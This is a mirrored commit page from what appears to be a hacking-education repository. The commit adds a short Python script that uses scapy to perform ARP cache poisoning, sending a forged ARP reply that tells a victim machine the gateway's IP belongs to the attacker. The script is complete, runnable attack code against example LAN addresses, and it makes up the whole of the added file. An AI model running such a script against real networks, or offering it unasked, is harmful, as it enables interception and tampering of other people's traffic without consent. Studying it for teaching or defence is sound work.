mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Create arp_cache_poisoner_simple.py
This commit is contained in:
parent
42feffba7e
commit
faf9f069ee
1 changed files with 25 additions and 0 deletions
|
@ -0,0 +1,25 @@
|
|||
from scapy.all import *
|
||||
|
||||
# Author: Omar Santos
|
||||
|
||||
# Perform ARP cache poisoning
|
||||
def perform_arpcache_poisoning(victim_ip, gateway_ip):
|
||||
"""
|
||||
Performs ARP cache poisoning by sending a crafted ARP packet to associate the gateway IP-MAC mapping
|
||||
with the victim IP.
|
||||
|
||||
:param victim_ip: IP address of the victim device whose ARP cache will be poisoned.
|
||||
:param gateway_ip: IP address of the legitimate gateway device whose IP-MAC mapping will be spoofed.
|
||||
"""
|
||||
# Construct the ARP packet
|
||||
packet = ARP(op=2, pdst=victim_ip, hwdst=getmacbyip(victim_ip), psrc=gateway_ip)
|
||||
|
||||
# Send the ARP packet
|
||||
send(packet, verbose=0)
|
||||
|
||||
# Specify the victim IP and gateway IP
|
||||
victim_ip = "192.168.1.100"
|
||||
gateway_ip = "192.168.1.1"
|
||||
|
||||
# Perform ARP cache poisoning
|
||||
perform_arpcache_poisoning(victim_ip, gateway_ip)
|
Loading…
Reference in a new issue